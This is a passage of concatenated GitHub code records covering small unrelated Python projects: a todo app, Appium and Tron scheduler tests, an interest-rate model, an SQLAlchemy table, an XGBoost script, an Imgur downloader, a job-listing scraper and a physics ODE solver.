종료')\n choice = int(input('>>> '))\n\n if choice == 1:\n self.list()\n if choice == 2:\n self.search()\n if choice == 3:\n self.create()\n if choice == 4:\n break\n\n\nif __name__ == '__main__':\n todo = TodoListView()\n todo.load()\n","repo_name":"Over-the-SNU/Time-Prototype","sub_path":"todo_view.py","file_name":"todo_view.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
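The repeat days in the view above travel as a single integer bitmask: bit i set means DAY_STR[i] is selected, encoded with `1 << DAY_STR.index(d)` and decoded by testing `1 << i & mask`. A self-contained sketch of the round trip (standalone, not tied to the app's models):

    DAYS = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')

    def encode_days(names):
        # Set bit i for each selected day, e.g. ['Mon', 'Wed'] -> 0b101 == 5.
        return sum(1 << DAYS.index(n) for n in names)

    def decode_days(mask):
        # Recover the day names whose bits are set in the mask.
        return [d for i, d in enumerate(DAYS) if mask & (1 << i)]

    assert encode_days(['Mon', 'Wed']) == 0b101
    assert decode_days(0b101) == ['Mon', 'Wed']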
+{"seq_id":"30941554612","text":"from testsutes.base_tecase import BaseTestCase\nfrom framework.Logger import Logger\nfrom memorandum.homepage import HomePage\nimport unittest\nimport appium\nlogger=Logger(\"register\").getlog()\nclass testRegister(BaseTestCase):\n def test_Register(self):\n self.hp=HomePage(self.driver)\n self.hp.register(\"LOL\",\"LOL@qq.com\",\"7654321\")\n try:\n self.assertEqual(\"智能备忘录\",self.driver.find_element(*self.hp.assertmemo).text)\n logger.info(\"注册成功\")\n print(\"jjjjjjjjjjjj\")\n except Exception as e:\n logger.error(\"注册失败\")\n print(\"hhhhhhhhhhhhhhhh\")\n self.hp.exit_login()\nif __name__==\"__main__\":\n unittest.main(verbosity=2)\n\n","repo_name":"15935622817/appium","sub_path":"testsutes/test_register.py","file_name":"test_register.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"30209933790","text":"from os import path\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom yieldenv.settings import PROJECT_ROOT\n\nRB_FACTOR = 25\nRS_FACTOR = 50\n# EXPONENT = 0.7\n\n\ndef borrow_lend_rates(\n util_rate: float,\n rb_factor: float = RB_FACTOR,\n rs_factor: float = RS_FACTOR,\n) -> tuple[float, float]:\n \"\"\"\n calculate borrow and supply rates based on utilization ratio\n with an arbitrarily-set shape\n \"\"\"\n\n assert (\n 0 <= util_rate < 1\n ), f\"utilization ratio must lie in [0,1), but got {util_rate}\"\n\n borrow_rate = util_rate / (rb_factor * (1 - util_rate))\n # initial_borrow_rate / (1 - util_rate) ** EXPONENT\n supply_rate = util_rate / (rs_factor * (1 - util_rate))\n # initial_supply_rate / (1 - util_rate) ** EXPONENT\n return borrow_rate, supply_rate\n\n\nif __name__ == \"__main__\":\n # exploratory plot\n util_rates = np.concatenate(\n [np.arange(0, 0.83, step=0.02), np.arange(0.835, 0.9999, step=0.0001)]\n )\n\n borrow_rates = []\n lend_rates = []\n\n for u in util_rates:\n r1, r2 = borrow_lend_rates(u)\n borrow_rates.append(r1)\n lend_rates.append(r2)\n\n plt.rcParams.update({\"font.size\": 15})\n\n plt.plot(\n util_rates,\n borrow_rates,\n label=f\"borrow interest rate $r_b=\\\\frac{{u}}{{{RB_FACTOR} \\\\times (1-u)}}$\",\n )\n plt.plot(\n util_rates,\n lend_rates,\n label=f\"supply interest rate $r_s=\\\\frac{{u}}{{{RS_FACTOR} \\\\times (1-u)}}$\",\n )\n plt.xlabel(\"utilization ratio $u$\")\n plt.ylabel(\"interest rate per annum $r$\")\n plt.xlim(0, 1)\n plt.ylim(0, 1.6)\n plt.legend(frameon=False)\n plt.tight_layout()\n fig_path = path.join(PROJECT_ROOT, f\"assets/interest_model.pdf\")\n plt.savefig(fig_path)\n plt.show()\n plt.close()\n","repo_name":"xujiahuayz/yieldAggregators","sub_path":"yieldenv/interest_rate.py","file_name":"interest_rate.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
+{"seq_id":"1802013995","text":"\"\"\"\nМодель таблицы.\n\"\"\"\n\nfrom sqlalchemy import CheckConstraint, Column, Date, Integer, String\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n\nclass Data(Base):\n \"\"\"\n Класс для таблицы, где мы будем хранить данные.\n \"\"\"\n\n __tablename__ = \"data\"\n id = Column(\"id\", Integer, primary_key=True)\n company = Column(\"company\", String, nullable=False)\n metric = Column(\"metric\", String)\n date = Column(\"date\", Date)\n fact = Column(\"fact\", Integer)\n forecast = Column(\"forecast\", Integer)\n check = CheckConstraint(\"metric = 'Qliq' or metric = 'Qoil'\")\n\n def __repr__(self) -> str:\n return f\"\"\"\n {self.date} {self.company} получила {self.fact} {self.metric}\n Прогноз: {self.forecast}\n \"\"\"\n\n\ndef create_tables(engine: Engine) -> None:\n \"\"\"\n Создаёт таблицу (предварительно удалив, если она уже существует).\n\n Args:\n engine: двигатель SQLAlchemy\n \"\"\"\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n","repo_name":"vyhuholl/test_backend_developer","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37999374858","text":"import pandas as pd\nimport xgboost as xgb\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nglh_df = pd.read_csv(r'C:\\Users\\LENOVO\\CV\\textile-defect-inspection\\dataset\\glh_features.csv')\nglcm_df = pd.read_csv(r'C:\\Users\\LENOVO\\CV\\textile-defect-inspection\\dataset\\glcm_features.csv')\n\ndf = pd.concat([glcm_df,glh_df],axis=1)\n\nX = df.iloc[:,:-1]\ny = df['label']\n\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.3, random_state=None)\n\nscaler = MinMaxScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\nxgb_classifier = xgb.XGBClassifier()\nxgb_classifier.fit(X_train,y_train)\n\ny_pred = xgb_classifier.predict(X_test)\n\nprint(accuracy_score(y_test, y_pred))\nprint(confusion_matrix(y_test, y_pred))","repo_name":"soucs/textile-defect-inspection","sub_path":"xgboost.py","file_name":"xgboost.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"69957641505","text":"import pygame\npygame.init()\nclass button:\n def __init__(self,\n x = None,\n y = None,\n w = None,\n h = None,\n c = None):\n self.x = x\n self.y = y\n self.h = h\n self.w = w\n self.c = c\n self.rect = pygame.Rect(self.x,self.y,self.w,self.h)\n def draw(self,pygame_window):\n pygame.draw.rect(pygame_window,self.c,self.rect)\nbut1 = button(x=0,y=0,w=600,h=300,c=(0,0,255))","repo_name":"dimasribnyj14/HomeWorksDimaSribnyj","sub_path":"Practice/Second Course Logika/gimn/modules/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"27844302117","text":"\"\"\"Tests for reconfiguring mcp.\"\"\"\nimport os\nimport tempfile\n\nimport pytest\n\nfrom testifycompat import assert_equal\nfrom testifycompat import run\nfrom testifycompat import setup\nfrom testifycompat import suite\nfrom testifycompat import teardown\nfrom testifycompat import TestCase\nfrom tests.assertions import assert_length\nfrom tron import mcp\nfrom tron.config import config_parse\nfrom tron.config import schema\nfrom tron.serialize import filehandler\n\n\nclass TestMCPReconfigure(TestCase):\n\n os.environ[\"SSH_AUTH_SOCK\"] = \"test-socket\"\n pre_config = dict(\n ssh_options=dict(agent=True, identities=[\"tests/test_id_rsa\"],),\n nodes=[dict(name=\"node0\", hostname=\"batch0\"), dict(name=\"node1\", hostname=\"batch1\"),],\n node_pools=[dict(name=\"nodePool\", nodes=[\"node0\", \"node1\"])],\n command_context={\"thischanges\": \"froma\",},\n jobs=[\n dict(\n name=\"test_unchanged\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_unchanged\", command=\"command_unchanged\",),],\n ),\n dict(\n name=\"test_remove\",\n node=\"node1\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[dict(name=\"action_remove\", command=\"command_remove\",),],\n cleanup_action=dict(name=\"cleanup\", command=\"doit\"),\n ),\n dict(\n name=\"test_change\",\n node=\"nodePool\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[\n dict(name=\"action_change\", command=\"command_change\",),\n dict(name=\"action_remove2\", command=\"command_remove2\", requires=[\"action_change\"],),\n ],\n ),\n dict(\n name=\"test_daily_change\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_daily_change\", command=\"command\",),],\n ),\n dict(\n name=\"test_action_added\",\n node=\"node0\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[dict(name=\"action_first\", command=\"command_do_it\"),],\n ),\n ],\n )\n\n post_config = dict(\n ssh_options=dict(agent=True, identities=[\"tests/test_id_rsa\"],),\n nodes=[dict(name=\"node0\", hostname=\"batch0\"), dict(name=\"node1\", hostname=\"batch1\"),],\n node_pools=[dict(name=\"nodePool\", nodes=[\"node0\", \"node1\"])],\n command_context={\"a_variable\": \"is_constant\", \"thischanges\": \"tob\",},\n jobs=[\n dict(\n name=\"test_unchanged\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_unchanged\", command=\"command_unchanged\",),],\n ),\n dict(\n name=\"test_change\",\n node=\"nodePool\",\n schedule=\"daily\",\n actions=[dict(name=\"action_change\", command=\"command_changed\",),],\n ),\n dict(\n name=\"test_daily_change\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_daily_change\", command=\"command_changed\",),],\n ),\n dict(\n name=\"test_new\",\n node=\"nodePool\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[dict(name=\"action_new\", command=\"command_new\",),],\n ),\n dict(\n name=\"test_action_added\",\n node=\"node0\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[\n dict(name=\"action_first\", command=\"command_do_it\"),\n dict(name=\"action_second\", command=\"command_ok\"),\n ],\n ),\n ],\n )\n\n def _get_config(self, idx, output_dir):\n config = dict(self.post_config if idx else self.pre_config)\n config[\"output_stream_dir\"] = output_dir\n return config\n\n def _get_runs_to_schedule(self, sched):\n last_run = sched.job.runs.get_newest(include_manual=False)\n last_run_time = last_run.run_time if last_run else None\n 
return sched.get_runs_to_schedule(last_run_time)\n\n @setup\n def setup_mcp(self):\n self.test_dir = tempfile.mkdtemp()\n self.mcp = mcp.MasterControlProgram(self.test_dir, \"config\")\n config = {schema.MASTER_NAMESPACE: self._get_config(0, self.test_dir)}\n container = config_parse.ConfigContainer.create(config)\n self.mcp.apply_config(container)\n\n @teardown\n def teardown_mcp(self):\n filehandler.OutputPath(self.test_dir).delete()\n filehandler.FileHandleManager.reset()\n\n def reconfigure(self):\n config = {schema.MASTER_NAMESPACE: self._get_config(1, self.test_dir)}\n container = config_parse.ConfigContainer.create(config)\n self.mcp.apply_config(container, reconfigure=True)\n\n @suite(\"integration\")\n def test_job_list(self):\n count = len(self.pre_config[\"jobs\"])\n assert_equal(len(self.mcp.jobs.get_names()), count)\n self.reconfigure()\n assert_equal(len(self.mcp.jobs.get_names()), count)\n\n @pytest.mark.skip(reason=\"This test doesn't currently as run1 is not scheduled.\",)\n @suite(\"integration\")\n def test_job_unchanged(self):\n assert \"MASTER.test_unchanged\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n orig_job = job_sched.job\n run0 = next(self._get_runs_to_schedule(job_sched))\n run0.start()\n run1 = next(self._get_runs_to_schedule(job_sched))\n\n assert_equal(job_sched.job.name, \"MASTER.test_unchanged\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 1)\n assert_equal(action_map[\"action_unchanged\"].name, \"action_unchanged\")\n assert_equal(str(job_sched.job.scheduler), \"daily 00:00:00 \")\n\n self.reconfigure()\n assert job_sched is self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n assert job_sched.job is orig_job\n\n assert_equal(len(job_sched.job.runs.runs), 2)\n assert_equal(job_sched.job.runs.runs[1], run0)\n assert_equal(job_sched.job.runs.runs[0], run1)\n assert run1.is_scheduled\n assert_equal(job_sched.job.context[\"a_variable\"], \"is_constant\")\n assert_equal(job_sched.job.context[\"thischanges\"], \"tob\")\n\n @suite(\"integration\")\n def test_job_unchanged_disabled(self):\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n orig_job = job_sched.job\n next(self._get_runs_to_schedule(job_sched))\n job_sched.disable()\n\n self.reconfigure()\n assert job_sched is self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n assert job_sched.job is orig_job\n assert not job_sched.job.enabled\n\n @suite(\"integration\")\n def test_job_removed(self):\n assert \"MASTER.test_remove\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_remove\")\n run0 = next(self._get_runs_to_schedule(job_sched))\n run0.start()\n run1 = next(self._get_runs_to_schedule(job_sched))\n\n assert_equal(job_sched.job.name, \"MASTER.test_remove\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 2)\n assert_equal(action_map[\"action_remove\"].name, \"action_remove\")\n\n self.reconfigure()\n assert \"test_remove\" not in self.mcp.jobs\n assert not job_sched.job.enabled\n assert not run1.is_scheduled\n\n @suite(\"integration\")\n def test_job_changed(self):\n assert \"MASTER.test_change\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n run0 = next(self._get_runs_to_schedule(job_sched))\n run0.start()\n next(self._get_runs_to_schedule(job_sched))\n assert_equal(len(job_sched.job.runs.runs), 2)\n\n assert_equal(job_sched.job.name, \"MASTER.test_change\")\n action_map = 
job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 2)\n\n self.reconfigure()\n new_job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n assert new_job_sched is job_sched\n assert new_job_sched.job is job_sched.job\n\n assert_equal(new_job_sched.job.name, \"MASTER.test_change\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 1)\n\n assert_equal(len(new_job_sched.job.runs.runs), 2)\n assert new_job_sched.job.runs.runs[1].is_starting\n assert new_job_sched.job.runs.runs[0].is_scheduled\n assert_equal(job_sched.job.context[\"a_variable\"], \"is_constant\")\n assert new_job_sched.job.context.base.job is new_job_sched.job\n\n @suite(\"integration\")\n def test_job_changed_disabled(self):\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n job_sched.disable()\n assert not job_sched.job.enabled\n\n self.reconfigure()\n new_job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_change\")\n assert not new_job_sched.job.enabled\n\n @suite(\"integration\")\n def test_job_new(self):\n assert \"test_new\" not in self.mcp.jobs\n self.reconfigure()\n\n assert \"MASTER.test_new\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_new\")\n\n assert_equal(job_sched.job.name, \"MASTER.test_new\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 1)\n assert_equal(action_map[\"action_new\"].name, \"action_new\")\n assert_equal(action_map[\"action_new\"].command, \"command_new\")\n assert_equal(len(job_sched.job.runs.runs), 1)\n assert job_sched.job.runs.runs[0].is_scheduled\n\n @suite(\"integration\")\n def test_daily_reschedule(self):\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_daily_change\")\n\n next(self._get_runs_to_schedule(job_sched))\n\n assert_equal(len(job_sched.job.runs.runs), 1)\n run = job_sched.job.runs.runs[0]\n assert run.is_scheduled\n\n action_runs = run.action_runs\n self.reconfigure()\n assert action_runs.is_cancelled\n\n assert_equal(len(job_sched.job.runs.runs), 1)\n new_run = job_sched.job.runs.runs[0]\n assert new_run is not run\n assert new_run.is_scheduled\n assert_equal(run.run_time, new_run.run_time)\n\n @suite(\"integration\")\n def test_action_added(self):\n self.reconfigure()\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_action_added\")\n assert_length(job_sched.job.action_graph.action_map, 2)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"Yelp/Tron","sub_path":"tests/mcp_reconfigure_test.py","file_name":"mcp_reconfigure_test.py","file_ext":"py","file_size_in_byte":10819,"program_lang":"python","lang":"en","doc_type":"code","stars":340,"dataset":"github-code","pt":"7"}
+{"seq_id":"2879428938","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport re\nfrom typing import Optional\n\nfrom praw.models import Submission\n\nfrom bdfr.exceptions import SiteDownloaderError\nfrom bdfr.resource import Resource\nfrom bdfr.site_authenticator import SiteAuthenticator\nfrom bdfr.site_downloaders.base_downloader import BaseDownloader\n\n\nclass Imgur(BaseDownloader):\n def __init__(self, post: Submission):\n super().__init__(post)\n self.raw_data = {}\n\n def find_resources(self, authenticator: Optional[SiteAuthenticator] = None) -> list[Resource]:\n self.raw_data = self._get_data(self.post.url)\n\n out = []\n if \"is_album\" in self.raw_data:\n for image in self.raw_data[\"images\"]:\n if \"mp4\" in image:\n out.append(Resource(self.post, image[\"mp4\"], Resource.retry_download(image[\"mp4\"])))\n else:\n out.append(Resource(self.post, image[\"link\"], Resource.retry_download(image[\"link\"])))\n else:\n if \"mp4\" in self.raw_data:\n out.append(Resource(self.post, self.raw_data[\"mp4\"], Resource.retry_download(self.raw_data[\"mp4\"])))\n else:\n out.append(Resource(self.post, self.raw_data[\"link\"], Resource.retry_download(self.raw_data[\"link\"])))\n return out\n\n @staticmethod\n def _get_data(link: str) -> dict:\n try:\n if link.endswith(\"/\"):\n link = link.removesuffix(\"/\")\n if re.search(r\".*/(.*?)(gallery/|a/)\", link):\n imgur_id = re.match(r\".*/(?:gallery/|a/)(.*?)(?:/.*)?$\", link).group(1)\n link = f\"https://api.imgur.com/3/album/{imgur_id}\"\n else:\n imgur_id = re.match(r\".*/(.*?)(?:_d)?(?:\\..{0,})?$\", link).group(1)\n link = f\"https://api.imgur.com/3/image/{imgur_id}\"\n except AttributeError:\n raise SiteDownloaderError(f\"Could not extract Imgur ID from {link}\")\n\n headers = {\n \"referer\": \"https://imgur.com/\",\n \"origin\": \"https://imgur.com\",\n \"content-type\": \"application/json\",\n \"Authorization\": \"Client-ID 546c25a59c58ad7\",\n }\n res = Imgur.retrieve_url(link, headers=headers)\n\n try:\n image_dict = json.loads(res.text)\n except json.JSONDecodeError as e:\n raise SiteDownloaderError(f\"Could not parse received response as JSON: {e}\")\n\n return image_dict[\"data\"]\n","repo_name":"aliparlakci/bulk-downloader-for-reddit","sub_path":"bdfr/site_downloaders/imgur.py","file_name":"imgur.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":2113,"dataset":"github-code","pt":"7"}
+{"seq_id":"2516714806","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL = 'https://au.indeed.com/jobs?q=data+science+internship&l=Sydney+NSW'\npage = requests.get(URL)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n\n# In[2]:\n\n\nresults = soup.find(id='resultsCol')\n\nprint(results.prettify())\n\n\n# In[3]:\n\n\njob_elems = results.find_all('div', class_='jobsearch-SerpJobCard')\nprint(job_elems)\n\n\n# In[4]:\n\n\nfor job_elem in job_elems:\n print(job_elem, end='\\n'*2)\n\n\n# In[5]:\n\n\nfor job_elem in job_elems:\n title_elem = job_elem.find('h2', class_='title')\n company_elem = job_elem.find('div', class_='sjcl')\n location_elem = job_elem.find('div', class_='summary')\n if None in (title_elem, company_elem, location_elem):\n continue\n print(title_elem.text.strip())\n print(company_elem.text.strip())\n print(location_elem.text.strip())\nprint()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"vidyasagarverma/webscrapping","sub_path":"webscrapping from indeed.py","file_name":"webscrapping from indeed.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"18733465886","text":"\nfw=\"aaa\"\nsw=\"cba\"\ntw=\"cdb\"\ntemp1=\"\"\ntemp2=\"\"\ntemp3=\"\"\nf1w=fw.lstrip(\"a\")\ns2w=sw.lstrip(\"a\")\nt2w=tw.lstrip(\"a\")\nl1=list(f1w)\nl2= list(s2w)\nl3= list(t2w)\nfor i in l1:\n temp1+=str(ord(i)-ord(\"a\"))\n\nfor i in l2:\n temp2+=str(ord(i)-ord(\"a\"))\nfor i in l3:\n temp3+=str(ord(i)-ord(\"a\"))\nif(temp1==\"\"):\n temp1=int(0)\nif(temp2==\"\"):\n temp2=int(0)\n\nif(int(temp1)+int(temp2)==int(temp3)):\n print(\"true\")\n\n","repo_name":"sathvikchandu/my-programs-","sub_path":"leetcode/leetcode_weekly_30.05.2021.py","file_name":"leetcode_weekly_30.05.2021.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70602460703","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.integrate import solve_ivp\n\n# pop_vv_vec=[1,0]\n\n\n# dim=2\nd_matrix = np.zeros((2, 2))\n# print(d_matrix)\n\npvc_before_pulse = 0\npcv_before_pulse = 0\npvv_before_pulse = 1 # Ground state\npcc_before_pulse = 0 # excited state\n\nmatrix_before_pulse = [[pvc_before_pulse, pvv_before_pulse], [pcv_before_pulse, pcc_before_pulse]]\n# print(matrix_before_pulse)\n\n\npvc_after_pulse = [1, 0]\npcv_after_pulse = np.transpose(pvc_after_pulse)\n\npvv_after_pulse = 0\npcc_after_pulse = 1 # excited state\n\n# ------------------ time scale -------------------\nti = 0\ntf = 20E-12 # s\nN = 5000\ntev = np.linspace(ti, tf, N)\n# ---- constants and parameters of the system -----\nhbar = 6.582119569E-16 # eV*s\nihbar = 1j * hbar\nE_lvl_spacing = 1 # eV\ntrans_dipole_mom = 1\ndephase_E = 1E-3 # eV\npop_cc_ = 0\npop_vv_i = 1\n\n# -------- parameters of optical pulse -------------\nAmp = 1\nt0 = 10E-12 # seconds\npulse_width = 1000E-16 # seconds\n# pulse_width=(pulse_width_fs)*(10**-15)\nom = E_lvl_spacing / hbar # Hz\n\n# -------------- initial conditions ----------------\np0 = 0 + 0 * 1j\n\n\n# function computing the EM pulse\ndef e_pulse(t, t0, om, Amp, pulse_width):\n return Amp * np.exp((-(t - t0) ** 2) / ((2 * pulse_width) ** 2)) * np.exp(1j * om * t)\n\n\n# RHS of the equation (version 1)\ndef f(t, p, E_lvl_spacing, ihbar, trans_dipole_mom, dephase_E, t0, om, Amp, pulse_width):\n dp = (1 / ihbar) * ((-1j * dephase_E - E_lvl_spacing) * p) + (1 / ihbar) * trans_dipole_mom * e_pulse(t, t0, om, Amp, pulse_width)\n # print(dp)\n return dp\n\n\n# RHS of the equation (version 2)\ndef f1(t, p, E_lvl_spacing, ihbar, trans_dipole_mom, dephase_E, t0, om, Amp, pulse_width):\n dp = (1 / ihbar) * ((-1j * dephase_E - E_lvl_spacing + om * hbar) * p) +\\\n (1 / ihbar) * trans_dipole_mom * e_pulse(t, t0, om*0, Amp, pulse_width)\n # print(dp)\n return dp\n\n# --------------------- solver ---------------------\nsol = solve_ivp(f, (ti, tf), [p0], t_eval=tev, first_step=tf/N,\n args=(E_lvl_spacing, ihbar, trans_dipole_mom, dephase_E, t0, om, Amp, pulse_width))\n\nt = sol.t\np = sol.y\nnorm = np.max(np.abs(p[0]))\n\nplt.plot(t/1e-12, e_pulse(t, t0, om, Amp, pulse_width))\nplt.plot(t/1e-12, np.real(p[0])/norm)\nplt.plot(t/1e-12, np.imag(p[0])/norm)\nplt.legend(['EM pump pulse', 'Polarization, real part', 'Polarization, imaginary part'])\nplt.xlabel(\"Time (ps)\")\nplt.ylabel(\"Polarization (a.u.)\")\nplt.show()","repo_name":"freude/pySBE","sub_path":"scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"}
+{"seq_id":"39484940808","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\n\n# Ce fichier définit des valeurs utilisées dans plusieurs scripts\n# du projet Baxter de Sara, Eder, Alain\n\nDEPLACEMENT = 0.5; # en CM, incrément de chaque déplacement\nDEPLACEMENT = DEPLACEMENT * 0.01\n\nBAXTER_USED_LIMB = 'right' # or 'left'\n","repo_name":"alainsanguinetti/projet_baxter","sub_path":"scripts/valeurs.py","file_name":"valeurs.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7275225126","text":"import numpy as np\n\ndef calcular_pi(n):\n \"\"\"\n n: la cantidad de terminos a emplear en la sumatoria\n return: la estimacion de pi/8\n \"\"\"\n if(isinstance(n, int)):\n #se inicializan los parametros auxiliares\n #resultado\n pi_octavos = 0\n #parametro auxiliar\n i = 1\n #llamado de la funcion recursiva\n return calcular_pi_aux(n, i, pi_octavos)\n else:\n raise ValueError(\"Tipo de datos incorrecto\")\n \ndef calcular_pi_aux(n, i, pi_octavos):\n \"\"\"\n n: cantidad de terminos en la sumatoria para aproximar pi/8\n i: variable que se incrementa en cada llamado recursivo\n pi_octavos: resultado a retornar\n \"\"\"\n if(n == 0):\n #condicion de parada: se retorna la variable con el resultado acumulado\n return pi_octavos\n else: \n #termino de la sumatoria de leibniz\n pi_octavos += 1 / (i * (i + 2))\n i += 4\n n -= 1\n #se hace el llamado recursivo\n return calcular_pi_aux(n, i, pi_octavos)\n \n \ndef test_1(n): \n pi_estimado = 8 * calcular_pi(n) \n error = np.pi - pi_estimado\n print(\"Estimacion de pi: \", pi_estimado )\n print(\"Error \", error)\n \nn = 1000\ntest_1(n)","repo_name":"BAMDH/Cosas_Uni","sub_path":"Intro programación/Prácticas/Notebooks_jupyter/Recursividad_cola/calcular_pi.py","file_name":"calcular_pi.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29768954169","text":"#!/usr/bin/env python3\n\nimport csv\nimport os\nimport re\nimport sys\nimport valve\n\nfrom argparse import ArgumentParser\n\n\ndef get_cl_id(cell_names, name):\n name = re.sub(r\"(DC|B|M|NK|T): \", \"\", name)\n if \" & \" in name:\n name = name.split(\" & \")[0]\n return cell_names.get(name, None)\n\n\ndef get_clean_marker(name):\n if name.endswith(\"++\"):\n return name[:-2], \"high\"\n elif name.endswith(\"+-\"):\n return name[:-2], \"low\"\n elif name.endswith(\"+\"):\n return name[:-1], \"positive\"\n elif name.endswith(\"-\"):\n return name[:-1], \"negative\"\n return name, None\n\n\ndef get_pr_id(gate_names, name):\n return gate_names.get(name, None)\n\n\ndef validate(cell_names_file, cell_levels_file, gate_names_file, cell_gate_file):\n \"\"\"\n :param cell_names_file: path to file containing Cell Ontology IDs & Labels\n :param cell_levels_file: path to file containing Cell Ontology IDs & membrane parts\n :param gate_names_file: path to file containing Protein Ontology IDs & Labels\n :param cell_gate_file: path to file to validate\n \"\"\"\n errors = []\n cell_names = {}\n with open(cell_names_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n for row in reader:\n cell_names[row[1]] = row[0]\n\n gate_names = {}\n with open(gate_names_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n for row in reader:\n gate_names[row[1]] = row[0]\n\n cell_levels = {}\n with open(cell_levels_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n for row in reader:\n curie = row[0]\n has_part = row[1]\n lacks_part = row[2]\n high_amount = row[3]\n low_amount = row[4]\n valid_gates = {}\n if has_part:\n for p in has_part.split(\"|\"):\n valid_gates[p] = \"positive\"\n if lacks_part:\n for p in lacks_part.split(\"|\"):\n valid_gates[p] = \"negative\"\n if high_amount:\n for p in high_amount.split(\"|\"):\n valid_gates[p] = \"high\"\n if low_amount:\n for p in low_amount.split(\"|\"):\n valid_gates[p] = \"low\"\n cell_levels[curie] = valid_gates\n\n table = os.path.splitext(os.path.basename(cell_gate_file))[0]\n with open(cell_gate_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n next(reader)\n idx = 1\n for line in reader:\n idx += 1\n cell_pop_name = line[0].strip()\n cell = get_cl_id(cell_names, cell_pop_name)\n if not cell:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 1),\n \"level\": \"ERROR\",\n \"message\": f\"'{cell_pop_name}' must be a name or synonym from Cell Ontology\",\n }\n )\n continue\n valid_gates = cell_levels.get(cell, {})\n\n # Compare to provided gates\n for marker_name in [x.strip() for x in line[1].split(\",\")]:\n marker_name_clean, level = get_clean_marker(marker_name)\n marker = get_pr_id(gate_names, marker_name_clean)\n if not marker:\n errors.append(\n {\n \"table\": table,\n \"cell\": valve.idx_to_a1(idx, 2),\n \"level\": \"ERROR\",\n \"message\": f\"'{marker_name}' must be a name or synonym from Protein Ontology\",\n }\n )\n 